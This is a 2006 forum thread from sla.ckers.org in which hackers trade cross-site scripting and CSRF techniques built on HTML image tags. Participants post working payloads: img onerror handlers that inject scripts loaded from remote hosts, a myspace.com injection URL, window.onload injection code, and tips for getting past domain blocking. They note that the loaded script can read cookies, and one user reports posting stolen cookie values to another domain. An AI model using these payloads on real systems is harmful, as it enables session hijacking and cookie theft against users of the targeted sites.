Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A on cross site request forgeries and breaking into sessions. It's one of the attacks that XSS enables and the attack of the future. For Session, fixations, hijacking, lockout, replay, session riding etc.... 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: Previous12
Current Page: 2 of 2
Re: CSRF from inside image tags, discuss please
Posted by: maluc
Date: November 09, 2006 12:49PM

yes, alert can be any javascript code.. so insert an entire exploit or just load a remote script

<img src="" onerror="x=document.createElement('<sc'+'ript src=http://ha.ckers.org/s.js>');document.body.appendChild(x)">

the remote script has full access to the DOM, including cookies

as for the iframe not working.. that may be ie6 only.. to lazy to consult the XSS cheat sheet

-maluc

Options: ReplyQuote
Re: CSRF from inside image tags, discuss please
Posted by: sjensen
Date: November 09, 2006 01:12PM

I pasted the above script in but received a "Internet Explorer can't open the internet site." This maybe because my company has the ha.ckers.org site blocked.

btw, I'm running IE 7.



Edited 1 time(s). Last edit at 11/09/2006 01:15PM by sjensen.

Options: ReplyQuote
Re: CSRF from inside image tags, discuss please
Posted by: rsnake
Date: November 09, 2006 01:25PM

That's retarded. Why do people keep blocking this domain? That's easy enough to get around. I threw the xss.js file on fthe.net:

http://fthe.net/xss.js

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: CSRF from inside image tags, discuss please
Posted by: sjensen
Date: November 09, 2006 01:54PM

I change the url, still got the same "IE can't open the internet site..." error message, but it did throw the alert with the cookie in it...

Options: ReplyQuote
Re: CSRF from inside image tags, discuss please
Posted by: maluc
Date: November 09, 2006 02:01PM

oh sorry, i forgot to add defer.. IE freaks out if you add anything to the document innerHTML before the page finishes loading.. adding DEFER should solve it:

<img src="" onerror="x=document.createElement('<sc'+'ript defer src=http://ha.ckers.org/s.js>');document.body.appendChild(x)">

btw, i can't tell you how long the damned error took me to debug the first time i ran across it ^^;

-maluc

Options: ReplyQuote
Re: CSRF from inside image tags, discuss please
Posted by: sjensen
Date: November 09, 2006 02:18PM

Adding the "defer" didn't prevent the error, but that's okay, because by adding that script it actually causes the application to crash anyway...

I did another test using xss that locked the application in an infinite loop posting the cookie value to another domain, then doing a history.back, then it reposts, then back, etc...also causing the application to crash...

Options: ReplyQuote
Re: CSRF from inside image tags, discuss please
Posted by: maluc
Date: November 09, 2006 04:29PM

hrm.. ya my logic was a bit flawed on that one.. because just appending the script tag (or anything) to the document was enough to cause the error while loading.. so the only surefire way is to either:

A) when it's for XSS, which injects html not javascript - use the defer tag.. i.e.
http://myspace.com/profile?id="><script defer src="http://ha.ckers.org/s.js"></script><x
or

B) when it's for XSS which injects into javascript code.. add a function to the window.onload event to insert that remote script to the document. this has a drawback of not executing until the page fully loads - so if that's unacceptable, the only choice is to inject the entire exploit into the local javascript.

an example of window.onload appending that doesn't overwrite existing window.onload events (overwriting might badly break a page):
if(window.attachEvent){window.attachEvent('onload','exploit')}function exploit(){alert('exploit code goes here')}

That only works for IE .. to work in firefox too, add an
else if(window.addEventListener){window.addEventListener('load','exploit',false)}
Thank IE for not following w3c standards.

All that replaces the blah in <img src="" onerror="blah"> .. hopefully i didn't overcomplicate the explanation (or make mistakes, too lazy to test but should work fine)

-maluc

Options: ReplyQuote
Re: CSRF from inside image tags, discuss please
Posted by: sjensen
Date: November 09, 2006 05:01PM

Strange...must be an ASP.NET thing because the window.attachEvent doesn't work. It renders the code to the page, but it doesn't execute it...

Options: ReplyQuote
Re: CSRF from inside image tags, discuss please
Posted by: bobstar
Date: December 04, 2006 10:06PM

Is it possible to execute anything on the _current_ page where the img tag resides ?

I'd like to e.g. forward the page to some other URL or execute some javascript...

Options: ReplyQuote
Re: CSRF from inside image tags, discuss please
Posted by: maluc
Date: December 04, 2006 10:39PM

nope.. only in IE6. with <img src="javascript:alert(1)">

can't do it in firefox or ie7 though.. in those, it's only useful for CSRF that doesn't require an XSS or POSTing

-maluc

Options: ReplyQuote
Re: CSRF from inside image tags, discuss please
Posted by: rsnake
Date: December 05, 2006 10:25AM

Or how about <IMG SRC="" onerror="alert('XSS')"> that would work too. ;) But if you are JUST talking about CSRF and not XSS the answer is no... you can't force the browser to go anywhere other than request a page. It won't "go" there as in render the content inside of the image tag, but it will send the browser there and act as a "click" regardless if the page you request is an image or not.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: CSRF from inside image tags, discuss please
Posted by: maluc
Date: December 05, 2006 01:51PM

ah, i was making the assumption it wasn't XSS and similar to the normal 'pick your remote image for an avatar' .. but if you can insert " quotations in that, onerror is definitely the way to go.

-maluc

Options: ReplyQuote
Pages: Previous12
Current Page: 2 of 2


Sorry, only registered users may post in this forum.